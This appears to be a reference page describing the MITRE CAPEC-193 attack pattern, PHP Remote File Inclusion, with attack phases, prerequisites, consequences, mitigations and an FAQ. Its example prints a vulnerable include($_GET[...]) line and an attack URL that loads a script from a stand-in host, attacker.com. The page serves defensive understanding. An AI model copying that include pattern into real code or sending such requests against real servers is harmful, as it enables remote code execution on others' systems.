CAPEC-193: PHP Remote File Inclusion
In this pattern the adversary is able to load and execute arbitrary code remotely available from the application. This is usually accomplished through an insecurely configured PHP runtime environment and an improperly sanitized "include" or "require" call, which the user can then control to point to any web-accessible file. This allows adversaries to hijack the targeted application and force it to execute their own instructions.
Last updated
Overview
CAPEC-193 (PHP Remote File Inclusion) is a detailed-level attack pattern catalogued by MITRE in the Common Attack Pattern Enumeration and Classification (CAPEC). It describes a recurring method attackers use to exploit software weaknesses.
How the attack works
The phases an attacker typically follows to carry out this attack.
- Step 1Explore
[Survey application] Using a browser or an automated tool, an adversary follows all public links on a web site. They record all the links they find.
- Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.
- Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
- Use a browser to manually explore the website and analyze how it is constructed. Many browser's plugins are available to facilitate the analysis or automate the URL discovery.
- Step 2Experiment
[Attempt variations on input parameters] The attack variants make use of a remotely available PHP script that generates a uniquely identifiable output when executed on the target application server. Possibly using an automated tool, an adversary requests variations on the inputs they surveyed before. They send parameters that include variations of payloads which include a reference to the remote PHP script. They record all the responses from the server that include the output of the execution of remote PHP script.
- Use a list of probe strings to inject in parameters of known URLs. The probe strings are variants of PHP remote file inclusion payloads which include a reference to the adversary controlled remote PHP script.
- Use a proxy tool to record results of manual input of remote file inclusion probes in known URLs.
- Step 3Exploit
[Run arbitrary server-side code] As the adversary succeeds in exploiting the vulnerability, they are able to execute server-side code within the application. The malicious code has virtual access to the same resources as the targeted application. Note that the adversary might include shell code in their script and execute commands on the server under the same privileges as the PHP runtime is running with.
- Develop malicious PHP script that is injected through vectors identified during the Experiment Phase and executed by the application server to execute a custom PHP script.
What the attacker needs
Prerequisites
- Target application server must allow remote files to be included in the "require", "include", etc. PHP directives
- The adversary must have the ability to make HTTP requests to the target web application.
Skills required
- Low skill: To inject the malicious payload in a web page
- Medium skill: To bypass filters in the application
Resources required
- None: No specialized resources are required to execute this type of attack.
Consequences
What a successful CAPEC-193 attack can achieve.
Modify Data
Affects: Integrity
Read Data
Affects: Confidentiality
Execute Unauthorized Commands
Affects: Authorization
Run Arbitrary Code
Gain Privileges
Affects: Accountability, Authentication, Authorization, Non-Repudiation
Bypass Protection Mechanism
Affects: Access Control, Authorization
How to mitigate it
Defenses that reduce the risk of CAPEC-193.
- Implementation: Perform input validation for all remote content, including remote and user-generated content
- Implementation: Only allow known files to be included (allowlist)
- Implementation: Make use of indirect references passed in URL parameters instead of file names
- Configuration: Ensure that remote scripts cannot be include in the "include" or "require" PHP directives
Examples
The adversary controls a PHP script on a server "http://attacker.com/rfi.txt" The .txt extension is given so that the script doesn't get executed by the attacker.com server, and it will be downloaded as text. The target application is vulnerable to PHP remote file inclusion as following: include($_GET['filename'] . '.txt') The adversary creates an HTTP request that passes their own script in the include: http://example.com/file.php?filename=http://attacker.com/rfi with the concatenation of the ".txt" prefix, the PHP runtime download the attack's script and the content of the script gets executed in the same context as the rest of the original script.
Frequently asked questions
Common questions about CAPEC-193.
- What is CAPEC-193?
- In this pattern the adversary is able to load and execute arbitrary code remotely available from the application. This is usually accomplished through an insecurely configured PHP runtime environment and an improperly sanitized "include" or "require" call, which the user can then control to point to any web-accessible file. This allows adversaries to hijack the targeted application and force it to execute their own instructions.
- How does a PHP Remote File Inclusion attack work?
- It typically unfolds over 3 phases. It begins with: [Survey application] Using a browser or an automated tool, an adversary follows all public links on a web site. They record all the links they find.
- How do you prevent CAPEC-193?
- Implementation: Perform input validation for all remote content, including remote and user-generated content
- What weaknesses does CAPEC-193 target?
- CAPEC-193 exploits 2 CWE weaknesses, including CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)), CWE-98 (Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')).
- How severe is CAPEC-193?
- MITRE rates CAPEC-193 as High severity with high likelihood of attack.
References
Attack-pattern data is sourced from the MITRE CAPEC catalog (v3.9). Weakness associations link to the corresponding CWE entries on RadicalNotion.AI.
Defend against CAPEC-193
Track the CVEs and weaknesses attackers exploit with this technique, with AI-written analysis and remediation guidance.